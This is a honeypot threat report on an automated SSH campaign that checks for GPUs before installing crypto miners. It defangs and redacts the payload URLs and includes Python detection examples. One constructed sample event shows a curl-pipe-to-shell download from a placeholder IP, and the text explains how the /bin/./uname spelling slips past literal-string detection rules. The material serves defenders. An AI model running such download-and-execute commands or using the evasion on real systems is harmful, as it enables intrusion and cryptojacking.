The anatomy of the GPU hunter
Before installing any miner, the attacker needs to know whether the investment is worthwhile. A server with a GPU is worth far more to a miner than one without: a CPU-only host is limited to CPU-friendly algorithms such as Monero's RandomX, while a GPU opens up much higher hashrates on GPU-oriented algorithms (XMRig ships CUDA and OpenCL backends for exactly this). The first objective, therefore, is hardware reconnaissance, and doing it without raising alerts.
The sequence we observed in 18,276 sessions is identical across all of them, the signature of an automated script:
Evasion technique: path obfuscation in uname
The use of /bin/./uname instead of uname is a small detail with a clear purpose. Inside a path, the dot (.) is a directory entry that means "this directory", so when the kernel resolves /bin/./uname it walks /bin, then . (which is /bin again), then uname. The binary that runs is /bin/uname and the output is exactly the same as plain uname. This is not path traversal in the vulnerability sense (no ../ escaping a directory); it is a cosmetic rewrite of the command string.
The value lies in the string signature: a detection rule that looks for the literal uname in command logs will not catch /bin/./uname if the implementation compares the raw string instead of normalizing the path first. Other spellings resolve to the same binary as well (/bin/../bin/uname, or /usr/bin/uname on merged-/usr systems), so a rule that keys on the literal has to canonicalize the command before matching.
2,555 executions of /bin/./uname versus 33,548 of plain uname. The technique appears only in a subset of sessions, not campaign-wide, which points to different tools or different configurations of the same scanner.
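To make the normalization point concrete, here is an added example (not code from the original page or from the honeypot project) that extracts the program a command line invokes, collapses `.` and `..` components the way the kernel's path lookup does, and compares a literal-string rule against a normalized one. The watch-list and the sample command lines are constructed for illustration; the `env uname` style of indirection is deliberately out of scope and noted in the code.

```python
import posixpath
import shlex

# Constructed watch-list: the probes the page discusses (uname, plus the
# hardware probes nvidia-smi and lspci). Matching is on the basename only.
WATCHED_BINARIES = {"uname", "nvidia-smi", "lspci"}


def canonical_argv0(command: str) -> str:
    """Return the basename of the program a shell command line invokes.

    Leading VAR=value assignments are skipped (e.g. 'LC_ALL=C /bin/./uname'),
    then '.' and '..' components and repeated slashes are collapsed with
    posixpath.normpath, mirroring how the kernel resolves the path.
    Limitation: wrappers such as 'env uname' or 'sh -c "uname"' yield the
    wrapper's name, not the wrapped program.
    """
    try:
        tokens = shlex.split(command)
    except ValueError:
        # Unbalanced quotes in the captured line: fall back to whitespace split.
        tokens = command.split()
    argv0 = ""
    for tok in tokens:
        name, sep, _ = tok.partition("=")
        if sep and not tok.startswith("/") and name.isidentifier():
            continue  # environment assignment, not the program
        argv0 = tok
        break
    if not argv0:
        return ""
    return posixpath.basename(posixpath.normpath(argv0))


def naive_match(command: str) -> bool:
    """Literal rule: flags only if the first token IS a watched name."""
    tokens = command.split()
    return bool(tokens) and tokens[0] in WATCHED_BINARIES


def normalized_match(command: str) -> bool:
    """Same rule applied after canonicalizing the program path."""
    return canonical_argv0(command) in WATCHED_BINARIES


def compare(commands):
    """Return [(command, naive_result, normalized_result), ...] for a batch."""
    return [(c, naive_match(c), normalized_match(c)) for c in commands]


if __name__ == "__main__":
    # Constructed sample command lines, not captured data.
    samples = [
        "uname -a",
        "/bin/./uname -a",
        "LC_ALL=C /bin/../bin/uname -m",
        "/usr/bin/nvidia-smi -L",
        "ls -la /tmp",
    ]
    for cmd, naive, norm in compare(samples):
        print(f"{cmd!r:40} literal={naive!s:5} normalized={norm}")
```

The literal rule misses every obfuscated spelling while the normalized one catches them all, and the normalized rule still stays quiet on unrelated commands. Apply the same canonicalization to any allow- or block-list that keys on program names.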
The link to crypto credentials
The GPU hunter campaign and the Solana-oriented credential dictionary are not a coincidence. Solana node operators frequently use servers with GPUs to accelerate validation operations. A compromised server belonging to a Solana validator offers value on three fronts:
- GPU for mining: immediate hashrate for XMRig or other miners
- Access to validator keys: potential theft of stake or validation commissions
- Access to hot-wallet funds: traders and validators frequently have wallets connected to the server
The payload attempt
On six occasions during the observation period, the sessions attempted to download an external script, spread across three distinct destinations. None managed to execute:
Defanged URLs (hxxp). Forensic artifacts: do not access or reconstruct.
- hxxp://151.242.[REDACTED].40/loader.sh: a bare IP, no DNS lookup involved. 684 bytes captured in the honeypot's isolated environment; execution was blocked.
- hxxp://197.255.[REDACTED].88:1987/favico.ico: a high port and a decoy filename (a fake favicon). Exactly 684 bytes, the same size as the first, consistent with the same payload being served from a second host.
- hxxp://31.172.[REDACTED].45/mot: 2 attempts, 0 bytes received. The download failed or was blocked at the source.
How to detect GPU hunters in your infrastructure
The detection signals are clear and inexpensive to implement:
- Alert on `nvidia-smi` or `lspci` in SSH logs: no legitimate maintenance script needs to run these commands via SSH immediately upon authentication.
- Detect the `SSH-2.0-Go` client: if your infrastructure has no internal applications written in Go that connect over SSH, any connection with that fingerprint is suspicious.
- Monitor downloads with `wget` or `curl` to direct IPs: URLs like `hxxp://1[.]2[.]3[.]4/` are payload distributors, not legitimate traffic.
- Block IPs with multiple failed credential attempts: fail2ban with a threshold of 5-10 attempts per IP in 60 seconds covers most of these scans.
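The four signals above, implemented together as an added example (not the honeypot's own code). It runs over a constructed, in-memory event stream in the shape a session-recording honeypot or SSH proxy would produce (client banner, login result, command lines, all timestamped), flags each session that shows a Go client banner, a hardware probe within 30 seconds of login, or a `wget`/`curl` to a bare IP, and applies a fail2ban-style sliding window to failed logins per source. The event schema, the 30-second probe window and the sample IPs (RFC 5737 documentation ranges) are assumptions.

```python
import posixpath
import re
from collections import defaultdict

HW_PROBES = {"nvidia-smi", "lspci"}
PROBE_WINDOW_S = 30  # assumed: probe this soon after login is attacker behaviour
# wget/curl with a URL whose host is a bare IPv4 (optional port), anywhere on the line
RAW_IP_URL = re.compile(
    r"\b(?:wget|curl)\b.*?https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.I
)


def argv0(command):
    """Basename of the invoked program, after collapsing '.'/'..' in the path."""
    tokens = command.split()
    return posixpath.basename(posixpath.normpath(tokens[0])) if tokens else ""


def session_findings(events):
    """Group events by session id; return {session_id: set(rule names fired)}."""
    by_session = defaultdict(list)
    for ev in events:
        by_session[ev["session"]].append(ev)
    findings = {}
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])
        hits, login_ts = set(), None
        for ev in evs:
            kind, data = ev["type"], ev["data"]
            if kind == "banner" and data.startswith("SSH-2.0-Go"):
                hits.add("go_ssh_client")
            elif kind == "login_ok":
                login_ts = ev["ts"]
            elif kind == "command":
                recent = login_ts is not None and ev["ts"] - login_ts <= PROBE_WINDOW_S
                if recent and argv0(data) in HW_PROBES:
                    hits.add("hw_probe_after_login")
                if RAW_IP_URL.search(data):
                    hits.add("download_from_raw_ip")
        findings[sid] = hits
    return findings


def ips_to_block(events, threshold=5, window_s=60):
    """fail2ban-style: sources with >= threshold failed logins in any window_s span."""
    failures = defaultdict(list)
    for ev in events:
        if ev["type"] == "login_failed":
            failures[ev["src"]].append(ev["ts"])
    blocked = set()
    for src, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window_s:
                start += 1  # slide the window forward
            if end - start + 1 >= threshold:
                blocked.add(src)
                break
    return blocked


# Constructed sample events, not real honeypot data.
SAMPLE_EVENTS = [
    # s1: automated GPU hunter, Go client, probes and payload fetch right after login
    {"session": "s1", "src": "198.51.100.7", "ts": 0.0, "type": "banner", "data": "SSH-2.0-Go"},
    {"session": "s1", "src": "198.51.100.7", "ts": 0.4, "type": "login_ok", "data": "root"},
    {"session": "s1", "src": "198.51.100.7", "ts": 0.9, "type": "command", "data": "/bin/./uname -a"},
    {"session": "s1", "src": "198.51.100.7", "ts": 1.2, "type": "command", "data": "/usr/bin/nvidia-smi -L"},
    {"session": "s1", "src": "198.51.100.7", "ts": 1.5, "type": "command", "data": "lspci | grep -i vga"},
    {"session": "s1", "src": "198.51.100.7", "ts": 2.0, "type": "command", "data": "curl -s http://192.0.2.40/loader.sh | sh"},
    # s2: administrator with OpenSSH, runs lspci ten minutes in, downloads from a hostname
    {"session": "s2", "src": "10.0.0.5", "ts": 100.0, "type": "banner", "data": "SSH-2.0-OpenSSH_9.6"},
    {"session": "s2", "src": "10.0.0.5", "ts": 101.0, "type": "login_ok", "data": "ops"},
    {"session": "s2", "src": "10.0.0.5", "ts": 701.0, "type": "command", "data": "lspci -nn"},
    {"session": "s2", "src": "10.0.0.5", "ts": 702.0, "type": "command", "data": "curl -O https://mirror.example.net/tool.tgz"},
] + [
    # six failed logins from one source inside ten seconds
    {"session": f"b{i}", "src": "203.0.113.9", "ts": 50.0 + i, "type": "login_failed", "data": "admin"}
    for i in range(6)
]

if __name__ == "__main__":
    for sid, hits in sorted(session_findings(SAMPLE_EVENTS).items()):
        if hits:
            print(sid, sorted(hits))
    print("block:", sorted(ips_to_block(SAMPLE_EVENTS)))
```

One caveat for production hosts: sshd at its default LogLevel does not write the client version string to auth.log, so the `SSH-2.0-Go` signal comes from a honeypot, an SSH proxy or a packet capture rather than from the standard authentication log. The hardware-probe rule is anchored to time-since-login on purpose: `lspci` from an administrator ten minutes into a session is routine, the same command within seconds of an automated login is not.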
Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure.
CipherSentry SSH honeypot · 2026-06-26 to 2026-06-28